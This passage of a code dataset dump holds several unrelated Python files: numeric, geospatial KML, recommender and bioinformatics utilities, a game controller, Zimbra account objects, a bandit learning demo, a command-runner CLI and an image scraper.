numpy as np\n\n\ndef ewma(x, halflife):\n \"\"\"\n Exponentially Weighted Moving Average\n It is expected that the numbers passed as x will be finite, halflife is\n expected to be a finite, non negative number.\n >>> ewma(np.arange(5), halflife=2)\n array([ 0. 
, 0.58578644, 1.22654092, 1.91911977, 2.65947261])\n \"\"\"\n assert np.isfinite(halflife) and 0 < halflife\n\n decay_coefficient = np.exp(np.log(0.5) / halflife)\n out = np.empty_like(x, dtype=np.float64)\n\n for i in range(out.shape[0]):\n if i == 0:\n out[i] = x[i]\n sum_prior = 1\n else:\n sum_i = sum_prior + np.power(decay_coefficient, i)\n out[i] = (decay_coefficient * out[i - 1] * sum_prior + x[i]) / sum_i\n sum_prior = sum_i\n\n return out\n\n\nif __name__ == '__main__':\n import pytest\n pytest.main([__file__])\n","sub_path":"fastats/maths/ewma.py","file_name":"ewma.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"79735244","text":"#\n#\n# Obsolete classes and functions. Moved here for sanity. Not checked if it can run as is. Need to check imports.\n#\n\nimport os, sys, pprint\nfrom fastkml import kml,styles\nfrom pygeoif import geometry\n \nFAKE_DATA = {\n \"clusters\" : 5, \n \"outlets\" :10,\n \"activations\":50,\n \"sellouts\": 50,\n \"stocks\":70\n}\n\n\nclass KMLReader:\n def __init__(self, k):\n self._k = k\n self.root = k.features().next()\n \n self.__styles()\n \n def __styles(self):\n if isinstance(self.root, kml.Document):\n self.__styles_dict, self.__stylemap_dict = self.__get_styles()\n \n def __get_styles (self):\n _gs_style_dict = {}\n _gs_stylemap_dict = {}\n for s in self.root.styles():\n if isinstance(s, styles.StyleMap):\n _gs_stylemap_dict[s.id] = { 'normal_url' : s.normal.url, 'highlight_url' : s.highlight.url }\t\t\t\t\n elif isinstance(s, styles.Style):\n for i_s in s.styles():\n if isinstance(i_s, styles.IconStyle):\t\t\t\t\t\n _ = _gs_style_dict.setdefault(s.id, {})\n _['icon_href'] = i_s.icon_href\n \n # end if\n if isinstance(i_s, styles.LineStyle):\n _ = _gs_style_dict.setdefault(s.id, {})\n _['lineColor'] = i_s.color\n _['lineWidth'] = i_s.width\n\n # end if\n if isinstance(i_s, styles.PolyStyle):\n _ = _gs_style_dict.setdefault(s.id, {})\n _.update({ 'polyColor' : i_s.color, 'polyColorMode' : i_s.colorMode, 'polyFill' : i_s.fill, 'polyOutline' : i_s.outline })\n # _gs_style_dict[s.id] = { 'color' : i_s.color, 'colorMode' : i_s.colorMode, 'fill' : i_s.fill, 'outline' : i_s.outline }\n # app.logger.debug(\"Found poly style: %s\", _)\n #end if\n # end for\n # end if\n return _gs_style_dict, _gs_stylemap_dict\n # end for\n def __get_color(self, p_style_url):\n # app.logger.debug(\"stylemap_dict: %s\", pprint.pformat(p_stylemap_dict))\n _s_map = self.__stylemap_dict.get(p_style_url.strip('#'), '')\n # app.logger.debug(\"Style Url: %s, %s\",p_style_url.strip('#'), _s_map)\n if _s_map:\t\t\t\n _s = self.__styles_dict.get(_s_map['normal_url'].strip('#'), '')\n # app.logger.debug(\"Style: %s\", _s)\n if _s:\n return _s['polyColor'], _s['lineColor'], _s['lineWidth']\n # end if\n # end if\n return ''\n # end def _get_color\n\n def __get_icon(self, p_style_url):\n # app.logger.debug(\"stylemap_dict: %s\", pprint.pformat(p_stylemap_dict))\n _s_map = self.__stylemap_dict.get(p_style_url.strip('#'), '')\n # app.logger.debug(\"Style Url: %s, %s\",p_style_url.strip('#'), _s_map)\n if _s_map:\t\t\t\n _s = self.__styles_dict.get(_s_map['normal_url'].strip('#'), '')\n # app.logger.debug(\"Style: %s\", _s)\n if _s:\n return {'href' : _s['icon_href'] }\n # end if\n # end if\n return ''\n def __get_polygons(self, features, selected_elements = [], recurse = False):\n polygons = []\n for c in features: #placemark\n if isinstance(c, kml.Placemark) and isinstance(c.geometry, 
geometry.Polygon) :\n style_url = c.styleUrl\n _poly_color, _line_color, _line_width = self.__get_color(style_url)\n\n if not selected_elements or c.name in selected_elements: \n polygons.append({\n 'name' : c.name, \n 'coords' :c.geometry.exterior.coords, \n 'description': simplejson.loads(c.description.replace('\\n','')) if c.description else FAKE_DATA, \n 'color': {\n 'polyColor' : _poly_color, \n 'lineColor' : _line_color, \n 'lineWidth' : _line_width,\n }\n })\n \n if isinstance(c, kml.Folder) and recurse:\n _p = self.__get_polygons(c, recurse)\n polygons.extend(_p)\n return polygons\n\n def __get_points(self, features, recurse = False):\n points = []\n for c in features: #placemark\n\n if isinstance(c, kml.Placemark) and isinstance(c.geometry, geometry.Point) :\n\n style_url = c.styleUrl\n # _poly_color, _line_color, _line_width = self.__get_color(style_url)\n i = self.__get_icon(style_url)\n points.append({ 'name':c.name, 'coords' : c.geometry.coords, 'icon' : i, 'description' : simplejson.loads(c.description.replace('\\n','')) if c.description else FAKE_DATA })\n # polygons.append({'name' : c.name, 'coords' :c.geometry.exterior.coords, 'color': { 'polyColor' : _poly_color, 'lineColor' : _line_color, 'lineWidth' : _line_width} })\n \n if isinstance(c, kml.Folder) and recurse:\n _p = self.__get_points(c, recurse)\n points.extend(_p)\n return points\n\n def getPoints(self, folder_name = None):\n points = []\n if isinstance(self.root, kml.Document):\n for b in self.root.features(): # folder\n\n if isinstance(b, kml.Folder) and b.name == folder_name:\n \n points = self.__get_points(b.features()) \n # end for\n # end if\n # end for\n # end if\t\n\n return points\n\n def getPolygons(self, folder_name = None, selected_elements = []):\n polygons = []\n if isinstance(self.root, kml.Document):\n for b in self.root.features(): # folder\n if isinstance(b, kml.Folder) and b.name == folder_name:\n polygons = self.__get_polygons(b.features()) if not selected_elements else self.__get_polygons(b.features(), selected_elements)\n # end for\n # end if\n # end for\n # end if\t\n\n return polygons\n \n\n \n# Utility class for getting Polygon from fastkml.KML objects.\n# DEPRECATED use KMLReader instead\nclass Polygon:\t\n #\n # get the KML object from fastkml, and get the Polygons only\n # returns list of dict.\n # dict contents: name, coords, color.\n\n @staticmethod\n def digest(k):\n # get the color of the style url of style_map from styles\n def _get_color(p_style_url, p_stylemap_dict, p_styles_dict):\n # app.logger.debug(\"stylemap_dict: %s\", pprint.pformat(p_stylemap_dict))\n _s_map = p_stylemap_dict.get(p_style_url.strip('#'), '')\n \n # app.logger.debug(\"Style Url: %s, %s\",p_style_url.strip('#'), _s_map)\n if _s_map:\t\t\t\n _s = p_styles_dict.get(_s_map['normal_url'].strip('#'), '')\n # app.logger.debug(\"Style: %s\", _s)\n if _s:\n \n return _s['polyColor'], _s['lineColor'], _s['lineWidth']\n # end if\n # end if\n return ''\n # end def _get_color\n \n \n # return dictionary of styles, and style map\n # style: key = style url\n #\t value = dict of normal_url and highlight_url\n #\n # style_map: key = style url\n # value: dict of color, colorMode, fill, outline\t\t\n def _get_styles (p_document):\n _gs_style_dict = {}\n _gs_stylemap_dict = {}\n for s in p_document.styles():\n if isinstance(s, styles.StyleMap):\n _gs_stylemap_dict[s.id] = { 'normal_url' : s.normal.url, 'highlight_url' : s.highlight.url }\t\t\t\t\n elif isinstance(s, styles.Style):\n for i_s in s.styles():\n if isinstance(i_s, 
styles.IconStyle):\t\t\t\t\t\n pass\n # end if\n if isinstance(i_s, styles.LineStyle):\n _ = _gs_style_dict.setdefault(s.id, {})\n _['lineColor'] = i_s.color\n _['lineWidth'] = i_s.width\n\n # end if\n if isinstance(i_s, styles.PolyStyle):\n _ = _gs_style_dict.setdefault(s.id, {})\n _.update({ 'polyColor' : i_s.color, 'polyColorMode' : i_s.colorMode, 'polyFill' : i_s.fill, 'polyOutline' : i_s.outline })\n # _gs_style_dict[s.id] = { 'color' : i_s.color, 'colorMode' : i_s.colorMode, 'fill' : i_s.fill, 'outline' : i_s.outline }\n # app.logger.debug(\"Found poly style: %s\", _)\n #end if\n # end for\n # end if\n # end for\n # app.logger.debug(\"styles_dict: %s\", pprint.pformat( _gs_style_dict ))\n # app.logger.debug(\"stylemap_dict: %s\", pprint.pformat(_gs_stylemap_dict))\n \n return _gs_style_dict, _gs_stylemap_dict\n # end def _get_styles\n \n polygons = []\n styles_dict = {}\n stylemap_dict = {}\n \n top_level = k.features()\n \n for a in k.features(): # document\n if isinstance(a, kml.Document):\n styles_dict, stylemap_dict = _get_styles(a)\n for b in a.features(): # folder\n if isinstance(b, kml.Folder):\n for c in b.features(): #placemark\n if isinstance(c, kml.Placemark):\n style_url = c.styleUrl\n _poly_color, _line_color, _line_width = _get_color(style_url, stylemap_dict, styles_dict )\n polygons.append({'name' : c.name, 'coords' :c.geometry.exterior.coords, 'color': { 'polyColor' : _poly_color, 'lineColor' : _line_color, 'lineWidth' : _line_width} })\n # end if\n # end for\n # end if\n # end for\n # end if\t\n # end for\n return polygons\n","sub_path":"apps/app/deprecated/kml.py","file_name":"kml.py","file_ext":"py","file_size_in_byte":10371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"266597270","text":"import pandas as pd\nimport numpy as np\n\n\nfrom hinpy.classes.object_group_class import *\nfrom time import time as TCounter\n\n\ndef RandomRecommender(start_object_group,end_object_group,parameters,verbose=False):\n\n\n\n start_objects = start_object_group.GetNames()\n end_objects = end_object_group.GetNames()\n\n start_group = start_object_group.name\n end_group = end_object_group.name\n\n relation_name=''\n timestamp=pd.Timestamp('')\n\n if verbose:\n t=TCounter()\n VerboseMessage(verbose,'Computing Random Recommendations of %s for %s...'%(end_group,start_group))\n\n recommended_table=pd.DataFrame(columns=['relation','start_group', 'start_object', 'end_group', 'end_object',\n 'value','timestamp'])\n\n # For each start object...\n counter=0\n for start_obj in start_objects:\n # We select random topK_predictions objects to recommend\n user_list = np.random.choice(end_objects,size=parameters['topK_predictions'])\n for end_obj in user_list:\n recommended_table.loc[counter] = [relation_name,start_group,start_obj,end_group,end_obj,'',timestamp]\n counter+=1\n\n if verbose:\n VerboseMessage(verbose,'Random Recommendations computed in %s.'%(ETSec2ETTime(TCounter()-t)))\n\n return recommended_table,{};\n","sub_path":"hinpy/rs/random_rs.py","file_name":"random_rs.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"71121799","text":"#=========================================================================\n# This is OPEN SOURCE SOFTWARE governed by the Gnu General Public\n# License (GPL) version 3, as described at www.opensource.org.\n# Copyright (C)2016 William H. 
Majoros (martiandna@gmail.com).\n#=========================================================================\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals, generators, nested_scopes, with_statement)\nfrom builtins import (bytes, dict, int, list, object, range, str, ascii,\n chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)\nfrom Bed3Record import Bed3Record\nfrom Bed6Record import Bed6Record\nimport re\n\n#=========================================================================\n# Attributes:\n# fh : file handle\n# Instance Methods:\n# reader=BedReader(filename)\n# record=reader.nextRecord() # Bed3Record or Bed6Record\n# reader.close()\n# list=BedReader.readAll(filename)\n# hash=BedReader.hashBySubstrate(filename) # chr -> list of records\n# Class Methods:\n# \n#=========================================================================\nclass BedReader:\n \"\"\"BedReader reads bed3 and/or bed6 files\"\"\"\n def __init__(self,filename):\n self.fh=open(filename,\"r\")\n\n @classmethod\n def readAll(cls,filename):\n reader=BedReader(filename)\n array=[]\n while(True):\n record=reader.nextRecord()\n if(not record): break\n array.append(record)\n reader.close()\n return array\n\n @classmethod\n def hashBySubstrate(cls,filename):\n list=cls.readAll(filename)\n hash={}\n for rec in list:\n if(hash.get(rec.chr,None) is None):\n hash[rec.chr]=[]\n hash[rec.chr].append(rec)\n return hash\n\n def close(self):\n self.fh.close()\n\n def nextRecord(self):\n while(True):\n line=self.fh.readline()\n if(not line): return None\n if(not re.search(\"\\S\",line)): continue\n line=line.rstrip()\n line=line.lstrip()\n fields=line.split()\n n=len(fields)\n if(n==3):\n return Bed3Record(fields[0],int(fields[1]),int(fields[2]))\n if(n==4):\n return Bed6Record(fields[0],int(fields[1]),int(fields[2]),\n fields[3],0.0,\".\")\n if(n==5):\n return Bed6Record(fields[0],int(fields[1]),int(fields[2]),\n fields[3],float(fields[4]),\".\")\n if(n==6):\n return Bed6Record(fields[0],int(fields[1]),int(fields[2]),\n fields[3],float(fields[4]),fields[5])\n raise Exception(\"wrong number of fields in bed file: \"+line)\n\n","sub_path":"BedReader.py","file_name":"BedReader.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"305156703","text":"from PaddleController import *\nfrom src.data_models.KeyListener import *\n\n\nclass PlayerPaddleController(PaddleController, KeyListener):\n\n STD_KEY_SET_LETTERS = [pygame.K_w, pygame.K_s] # when on_key_up/down method is called, it is checked if one of these keys is pressed\n STD_KEY_SET_ARROWS = [pygame.K_UP, pygame.K_DOWN]\n\n def __init__(self, paddle, key_set): # [UP_KEY, DOWN_KEY]\n PaddleController.__init__(self, paddle)\n self.key_set = key_set\n\n def on_key_up(self, event):\n if event.key == self.key_set[0]:\n self.get_paddle().on_up_activate()\n elif event.key == self.key_set[1]:\n self.get_paddle().on_down_activate()\n\n def on_key_down(self, event):\n if event.key == self.key_set[0]:\n self.get_paddle().on_up_deactivate()\n elif event.key == self.key_set[1]:\n self.get_paddle().on_down_deactivate()\n\n def update(self, dt):\n pass\n","sub_path":"Pong/src/game/controllers/PlayerPaddleController.py","file_name":"PlayerPaddleController.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"598557274","text":"import numpy as np\nimport 
pandas as pd\n\nfrom matplotlib import pyplot as plt\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom nltk.tokenize import TreebankWordTokenizer\nfrom numpy.linalg import norm\nfrom sklearn.cluster import KMeans\nfrom sklearn.feature_extraction.text import CountVectorizer\n\ntokenizer = TreebankWordTokenizer()\neng_stopwords = tuple(stopwords.words(\"english\"))\nstemmer = PorterStemmer()\n\n\ndef tokenization(sent):\n \"\"\"\n @author: Mihir Gadgil\n Tokenizer for vectorizing sentences.\n \"\"\"\n # Tokenize sentence\n tokens = tokenizer.tokenize(sent)\n # Remove stopwords and stemming\n processed_tokens = [stemmer.stem(token) for token in tokens if token not in eng_stopwords]\n return processed_tokens\n\n\n# Text vectorizer for CosineSimilarity\nvectorizer = CountVectorizer(tokenizer=tokenization, binary=True)\n\n\ndef JaccardSimilarity(sent1, sent2):\n \"\"\"\n @author: Mihir Gadgil\n Sentence Jaccard similarity.\n \"\"\"\n tokens1 = set(tokenizer.tokenize(sent1))\n tokens2 = set(tokenizer.tokenize(sent2))\n\n return len(tokens1.intersection(tokens2)) / len(tokens1.union(tokens2))\n\n\ndef CosineSimilarity(sent1, sent2):\n \"\"\"\n @author: Mihir Gadgil\n Sentence cosine similarity.\n \"\"\"\n sents = vectorizer.fit_transform([sent1, sent2]).toarray()\n return np.matmul(sents[0], sents[1].T) / (norm(sents[0]) * norm(sents[1]))\n\n\nclass StemmerTokenizer(object):\n def __init__(self):\n self.porter_stemmer = PorterStemmer()\n self.treebank_tokenizer = TreebankWordTokenizer()\n\n def __call__(self, sentence):\n return [self.porter_stemmer.stem(token) for token in self.treebank_tokenizer.tokenize(sentence)\n if token not in eng_stopwords]\n\n\ndef KMeansClusteringElbowCurve(quote_dict):\n \"\"\"Shows an elbow curve plot to determine the appropriate number of k-means clusters.\"\"\"\n count_vectorizer = CountVectorizer(tokenizer=StemmerTokenizer(), lowercase=True,\n stop_words=stopwords.words('english'), binary=True)\n X = count_vectorizer.fit_transform(quote_dict.values())\n distorsions = []\n for k in range(1, 4):\n kmeans_model = KMeans(n_clusters=k)\n kmeans_model.fit(X)\n distorsions.append(kmeans_model.inertia_)\n fig = plt.figure(figsize=(15, 5))\n plt.plot(range(1, 4), distorsions)\n plt.title('Elbow Curve')\n plt.show()\n\n\ndef KMeansClustering(quote_dict, clusters=2):\n \"\"\"Returns a pandas data frame containing the quote_dict and cluster label.\"\"\"\n count_vectorizer = CountVectorizer(tokenizer=StemmerTokenizer(), lowercase=True)\n X = count_vectorizer.fit_transform(quote_dict.values()).toarray()\n kmeans_model = KMeans(n_clusters=clusters).fit(X)\n y = kmeans_model.predict(X)\n kmeans_df = pd.DataFrame.from_dict(quote_dict, orient='index', columns=['sentence'])\n kmeans_df[\"cluster\"] = kmeans_model.labels_\n return X, y, kmeans_model, kmeans_df\n\n\ndef KMeansClusteringPlot(X, y, kmeans_model, quote_dict):\n \"\"\"Show clusters with centroids from k-means.\"\"\"\n plt.scatter(X[:, 0][0], X[:, 1][0], s=200, color='blue', label=[k for k in quote_dict.keys()][0])\n plt.scatter(X[:, 0][1], X[:, 1][1], s=200, color='red', label=[k for k in quote_dict.keys()][1])\n plt.scatter(X[:, 0][2], X[:, 1][2], s=200, color='green', label=[k for k in quote_dict.keys()][2])\n centers = kmeans_model.cluster_centers_\n plt.scatter(centers[:, 0], centers[:, 1], c='black', s=100, alpha=0.6)\n plt.legend()\n plt.show()\n\n\nif __name__ == \"__main__\":\n quote_dict = {'cnn': 'witch hunt', 'fox': 'donald trump says this is a witch hunt',\n 'bbc': 'donald trump is a 
crookity crook who should be impeached'}\n\n    kmeans_elbow = KMeansClusteringElbowCurve(quote_dict)\n\n    X, y, kmeans_model, kmeans_df = KMeansClustering(quote_dict)\n    print(kmeans_df)\n\n    kmeans_plot = KMeansClusteringPlot(X, y, kmeans_model, quote_dict)\n","sub_path":"library/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":3956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"167603059","text":"from . import ZObject\n\n\nclass FilterRule(ZObject):\n    \"\"\" A mailbox filter rule object\n    \"\"\"\n    TAG_NAME = 'filter'\n    ATTRNAME_PROPERTY = 'name'\n\n\nclass Identity(ZObject):\n    \"\"\"An identity object\n    \"\"\"\n    SELECTORS = ('name', 'id')\n    TAG_NAME = 'identity'\n    ATTRNAME_PROPERTY = 'name'\n\n    def to_creator(self):\n        \"\"\" Returns the dict suitable for CreateIdentity or ModifyIdentity\n        \"\"\"\n        o = {}\n\n        for prop in ('name', 'id'):\n            if hasattr(self, prop):\n                o[prop] = getattr(self, prop)\n\n        try:\n            if len(self.a) > 0:\n                o['a'] = []\n                for node in self._unparse_a_tags(self._a_tags):\n                    o['a'].append(node)\n        except AttributeError:\n            pass\n        return o\n\n    def is_default(self):\n        \"\"\" Is it the default identity? \"\"\"\n        # it's not just a convention: the default identity name cannot be\n        # changed...\n        return self.name == 'DEFAULT'\n\n    def to_selector(self):\n        \"\"\" For some reason, the selector for <identity> is\n\n        <identity id=\"1234\" />\n\n        rather than\n\n        <identity><id>1234</id></identity>\n        \"\"\"\n\n        for i in self.SELECTORS:\n            if hasattr(self, i):\n                val = getattr(self, i)\n                selector = i\n                break\n\n        return {selector: val}\n\n\nclass Signature(ZObject):\n    TAG_NAME = 'signature'\n    SELECTORS = ('id', 'name')\n\n    @classmethod\n    def from_dict(cls, d):\n        \"\"\" Override default, adding the capture of content and contenttype.\n        \"\"\"\n        o = super(Signature, cls).from_dict(d)\n        if 'content' in d:\n            # Sometimes there are several contents (one txt, the other html); take the last\n            try:\n                o._content = d['content']['_content']\n                o._contenttype = d['content']['type']\n            except TypeError:\n                o._content = d['content'][-1]['_content']\n                o._contenttype = d['content'][-1]['type']\n\n        return o\n\n    def to_selector(self):\n        \"\"\" For some reason, the selector for <signature> is\n\n        <signature id=\"1234\" />\n\n        rather than\n\n        <signature><id>1234</id></signature>\n        \"\"\"\n\n        for i in self.SELECTORS:\n            if hasattr(self, i):\n                val = getattr(self, i)\n                selector = i\n                break\n\n        return {selector: val}\n\n    def get_content(self):\n        return self._content\n\n    def set_content(self, content, contenttype='text/html'):\n        self._content = content\n        self._contenttype = contenttype\n\n    def to_creator(self, for_modify=False):\n        \"\"\" Returns a dict object suitable for a 'CreateSignature'.\n\n        A signature object for creation is like:\n\n        <signature name=\"unittest\">\n            <content type=\"text/plain\">My signature content</content>\n        </signature>\n\n        which is:\n\n        {\n            'name' : 'unittest',\n            'content': {\n                'type': 'text/plain',\n                '_content': 'My signature content'\n            }\n        }\n\n        Note that if the contenttype is text/plain, the content with text/html\n        will be cleared by the request (for consistency).\n        \"\"\"\n        signature = {}\n\n        if for_modify:\n            try:\n                # we should have an ID\n                signature['id'] = self.id\n            except AttributeError:\n                raise AttributeError('a modify request should specify an ID')\n            # Case where we change or set a name\n            if hasattr(self, 'name'):\n                signature['name'] = self.name\n\n        else:\n            # a new signature should have a name\n            signature['name'] = self.name\n\n        if self.has_content():\n            # Set one, flush the other (otherwise we would leave stale content behind...)\n            if self._contenttype == 'text/plain':\n                plain_text = self._content\n                html_text = ''\n            else:\n                html_text = self._content\n                
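# the unused text/plain slot is cleared just below, so the request does not carry stale content (see the docstring note above)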
plain_text = ''\n\n content_plain = {'type': 'text/plain', '_content': plain_text}\n content_html = {'type': 'text/html', '_content': html_text}\n\n signature['content'] = [content_plain, content_html]\n\n else:\n # A creation request should have a content\n if not for_modify:\n raise AttributeError(\n 'too little information on signature, '\n 'run setContent before')\n\n return signature\n\n def has_content(self):\n return (hasattr(self, '_content') and hasattr(self, '_contenttype'))\n\n def get_content_type(self):\n return self._contenttype\n","sub_path":"zimsoap/zobjects/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"260047924","text":"import tensorflow as tf\nimport numpy as np\n\nbandits = [0.5, -0.3, 0, -0.2, 0.5]\nnum_bandits = len(bandits)\n\ndef pullBandit(bandit):\n\tresult = np.random.randn(1)\n\tif result > bandit:\n\t\t# Return positive reward\n\t\treturn 1\n\telse:\n\t\t# Return negative reward\n\t\treturn -1\n\ntf.reset_default_graph()\n\n# Feed-forward part of the network. Does the choosing\nweights = tf.Variable(tf.ones([num_bandits])) # tf variable with 1 weights\nchosen_action = tf.argmax(weights,0)\n\n# Establish training procedure. Feed reward and action into network\nreward_holder = tf.placeholder(shape=[1],dtype=tf.float32)\naction_holder = tf.placeholder(shape=[1],dtype=tf.int32)\nresponsible_weight = tf.slice(weights,action_holder,[1])\nloss = -(tf.log(responsible_weight)) * reward_holder\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)\nupdate = optimizer.minimize(loss)\n\ntotal_episodes = 1000 # total number of iterations for training\ntotal_reward = np.zeros(num_bandits) # scoreboard for bandits\ne = 0.1 # Chance of random action\n\ninit = tf.global_variables_initializer()\n\n# Launch tensorflow graph\nwith tf.Session() as sess:\n\tsess.run(init)\n\ti = 0\n\twhile i < total_episodes:\n\t\tif np.random.rand(1) < e:\n\t\t\taction = np.random.randint(num_bandits)\n\t\telse:\n\t\t\taction = sess.run(chosen_action)\n\n\t\treward = pullBandit(bandits[action]) # Get reward for picking bandit\n\n\t\t# Update network\n\t\t_, resp, ww = sess.run([update, responsible_weight, weights], feed_dict={reward_holder:[reward],action_holder:[action]})\n\t\t# update running tally of scores\n\t\ttotal_reward[action] += reward\n\t\tif i % 50 == 0:\n\t\t\tprint(\"Running reward for the \" + str(num_bandits) + \" bandits \" + str(total_reward))\n\t\ti += 1\n\n\tprint(\"The agent thinks bandit \" + str(np.argmax(ww)+1) + \" is the most promising...\")\n\tif np.argmax(ww) == np.argmax(-np.array(bandits)):\n\t\tprint(\"... and it was right!\")\n\telse:\n\t\tprint(\"... 
and it was wrong!\")","sub_path":"My Sandbox/armed_bandits.py","file_name":"armed_bandits.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"353950485","text":"#!/usr/bin/env python3\n\"\"\"\n Run commands from .cmd files, storing output in .out files\n\"\"\"\nfrom __future__ import print_function\n\nimport argparse\nimport os\nimport sys\nfrom subprocess import PIPE, Popen\n\n\ndef expand_path(path):\n \"\"\"Expand variables in and provide absolute version of the given 'path'\"\"\"\n\n return os.path.abspath(os.path.expanduser(os.path.expandvars(path)))\n\n\ndef update_file(fpath, content):\n \"\"\"Writes 'content' to 'fpath'\"\"\"\n\n with open(fpath, \"w+\") as output:\n output.write(content)\n\n\ndef cmd_run(cmd, args):\n \"\"\"Execute the given command and return stdout, stderr, and returncode\"\"\"\n\n with Popen(\n cmd, shell=True, stdout=PIPE, stderr=PIPE, executable=args.shell\n ) as process:\n out, err = process.communicate()\n\n return out, err, process.returncode\n\n\ndef cmd_from_file(fpath):\n \"\"\"Produces a 'cmd' as a list of strings from the given 'fpath'\"\"\"\n\n # Grab commands\n with open(fpath) as cmdfd:\n cmds = [line.strip() for line in cmdfd.readlines()]\n\n # Merge those line-continuations\n cmds = \"\\n\".join(cmds).replace(\"\\\\\\n\", \"\").splitlines()\n\n if not cmds:\n fname = os.path.basename(fpath)\n cmds = [fname.replace(\".uone\", \"\").replace(\".cmd\", \"\")]\n\n return cmds\n\n\ndef produce_cmd_output(args):\n \"\"\"Do the actual work\"\"\"\n\n for root, _, fnames in os.walk(args.path):\n # without --recursive, only the top-level directory is processed\n if not args.recursive and root != args.path:\n continue\n\n for fname in sorted(fname for fname in fnames if fname.endswith(\".cmd\")):\n if args.exclude and args.exclude in fname:\n continue\n\n cmd_fpath = os.sep.join([root, fname])\n\n out_fpath = cmd_fpath.replace(\".cmd\", \".out\")\n err_fpath = cmd_fpath.replace(\".cmd\", \".err\")\n uone = cmd_fpath.endswith(\".uone.cmd\")\n output = []\n errored = False\n\n for cmd in cmd_from_file(cmd_fpath):\n stdout, stderr, rcode = cmd_run(cmd, args)\n\n output.append(stdout)\n output.append(stderr)\n\n err = bool(rcode) and not uone\n errored |= err\n\n yield out_fpath, cmd_fpath, cmd, rcode, uone, err\n\n if errored:\n update_file(err_fpath, \"\\n\".join([o.decode(\"utf-8\") for o in output]))\n\n if not errored or uone:\n update_file(out_fpath, \"\\n\".join([o.decode(\"utf-8\") for o in output]))\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Run commands from .cmd files, storing output in .out files\"\n )\n parser.add_argument(\"path\", type=str, help=\"Path to DIR containing .cmd files\")\n parser.add_argument(\"-r\", \"--recursive\", action=\"store_true\", help=\"go deepah!\")\n parser.add_argument(\"-s\", \"--shell\", help=\"Absolute path to the Shell to use\")\n parser.add_argument(\"-x\", \"--exclude\", help=\"Exclude command-files matching this\")\n\n args = parser.parse_args()\n args.path = expand_path(args.path)\n\n return args\n\n\ndef main():\n \"\"\"Entry point\"\"\"\n\n args = parse_args()\n\n nerrs = 0\n\n try:\n print(\"args:\")\n print(\" path: %r\" % args.path)\n print(\" recursive: %r\" % args.recursive)\n print(\"results:\")\n for out_fp, cmd_fp, cmd, rcode, uone, err in produce_cmd_output(args):\n nerrs += int(err)\n\n print(\"- out_fp: %r\" % out_fp)\n print(\" cmd_fp: %r\" % cmd_fp)\n print(\" cmd: %r\" % cmd)\n print(\" rcode: %r\" % rcode)\n print(\" uone: %r\" % uone)\n 
print(\" err: %r\" % err)\n\n except OSError as exc:\n print(\"# err(%s)\" % exc)\n return 1\n\n print(\"nerrs: %r\" % nerrs)\n\n return nerrs\n","sub_path":"src/kmdo/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"207691526","text":"import re\nimport requests\nfrom urllib import error\nfrom bs4 import BeautifulSoup\nimport os\n\ndownload_pic_index = 0\n\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',\n]\n\n\ndef Find(url, max_page=39):\n List = []\n print('Counting the total number of images, please wait.....')\n t = 2\n s = 0\n while t < max_page:\n Url = url + str(t)\n try:\n Result = requests.get(Url, timeout=7)\n except BaseException:\n t = t + 1\n continue\n else:\n result = Result.text\n html_urls = re.findall('\"_blank\" href=\"(.*?)\"', result, re.S)\n\n for html_url in html_urls:\n if \"login\" not in html_url:\n try:\n Result = requests.get(Url, timeout=7)\n result = Result.text\n pic_urls = re.findall('src=\"(.*?)\"', result, re.S)\n\n s += len(pic_urls)\n if len(pic_urls) == 0:\n break\n else:\n List.append(pic_urls)\n\n except BaseException:\n continue\n t = t + 1\n\n\n\n\n\n return List, s\n\n\ndef dowmloadPicture(url_list, savepath, limit):\n global download_pic_index\n\n if not os.path.exists(savepath):\n os.mkdir(savepath)\n\n for eachhtml in url_list:\n for picurl in eachhtml:\n if \"900.png\" not in picurl:\n continue\n print('Downloading image No.' + str(download_pic_index + 1) + ', image URL: ' + str(picurl))\n try:\n if picurl is not None:\n pic = requests.get(picurl, timeout=7)\n else:\n continue\n except BaseException:\n print('Error: the current image cannot be downloaded')\n continue\n else:\n filetail = \".\" + picurl.split(\".\")[-1]\n\n if any(filetail == extension for extension in IMG_EXTENSIONS):\n download_file_path = 'pic_' + str(download_pic_index) + filetail\n else:\n download_file_path = 'pic_' + str(download_pic_index) + '.' + \"jpg\"\n\n download_file_path = os.path.join(savepath, download_file_path)\n fp = open(download_file_path, 'wb')\n fp.write(pic.content)\n fp.close()\n download_pic_index += 1\n if download_pic_index >= limit:\n return\n\n\ndef goToFind(savepath, limit):\n #11690 39,933 17,6570 19,414 , 88\n label = [\"11690\", \"933\", \"6570\", \"414\"]\n max_page = [39, 17, 19, 88]\n for index in range(3):\n\n url = 'https://ku.pzhan.com/'+label[index]+'/p'\n savepath = savepath + label[index]\n url_list, pic_count = Find(url, max_page[index])\n\n if not os.path.exists(savepath):\n os.mkdir(savepath)\n dowmloadPicture(url_list, os.path.join(savepath), 